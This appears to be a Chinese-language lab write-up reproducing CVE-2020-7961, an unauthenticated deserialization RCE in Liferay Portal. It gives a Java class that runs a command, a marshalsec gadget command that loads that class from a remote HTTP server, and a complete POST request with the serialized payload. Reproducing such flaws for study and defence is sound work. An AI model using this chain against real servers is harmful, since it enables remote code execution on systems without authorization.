CVE-2020-7961 Liferay Portal 反序列化

漏洞说明

Liferay是一个开源的Portal产品,提供对多个独立系统的内容集成,为企业信息、流程等的整合提供了一套完整的解决方案,和其他商业产品相比,Liferay有着很多优良的特性,而且免费,在全球都有较多用户。该洞是个反序列化导致的RCE,通过未授权访问其api传递json数据进行反序列化,危害较高

影响范围

Liferay Portal 6.1、6.2、7.0、7.1、7.2

环境搭建

漏洞环境:https://github.com/liferay/liferay-portal/releases/tag/7.2.0-ga1
java1.8(生成poc,其他版本可能无效)

启动环境(5~10分钟)

.\tomcat-9.0.17\bin\catalina.bat run

CVE-2020-7961 Liferay Portal 反序列化_第1张图片
访问8080端口:http://192.168.134.128:8080/
CVE-2020-7961 Liferay Portal 反序列化_第2张图片

漏洞复现

创建LifExp.java(该写法为目标是Windows,运行计算器)->编译class文件

public class LifExp { 
    static { 
        try { 
            String[] cmd = {"cmd.exe", "/c", "calc.exe"};
            java.lang.Runtime.getRuntime().
exec(cmd).waitFor(); 
        } catch ( Exception e ) { 
            e.printStackTrace(); 
        } 
    } 
}

在class文件目录起http服务,使之能访问
在这里插入图片描述
使用marshalsec生成json数据进行反序列化

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson C3P0WrapperConnPool http://192.168.134.130:9001/ LifExp

CVE-2020-7961 Liferay Portal 反序列化_第3张图片
启动burp构造数据包,替换WrapperConnectionPoolDataSource=后的部分为上一步生成的数据

POST /api/jsonws/invoke HTTP/1.1
Host: 192.168.207.133:8080
Content-Length: 1365
Content-Type: application/x-www-form-urlencoded
Connection: close

cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=o3lt8q1F&formDate=1585270368703&tableId=1&name=2&type=3&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString":"HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064c696645787074001c687474703a2f2f3139322e3136382e3133342e3133303a393030312f740003466f6f%3B%22%7D

send数据包,成功反序列化弹出计算器
CVE-2020-7961 Liferay Portal 反序列化_第4张图片

你可能感兴趣的:(漏洞复现)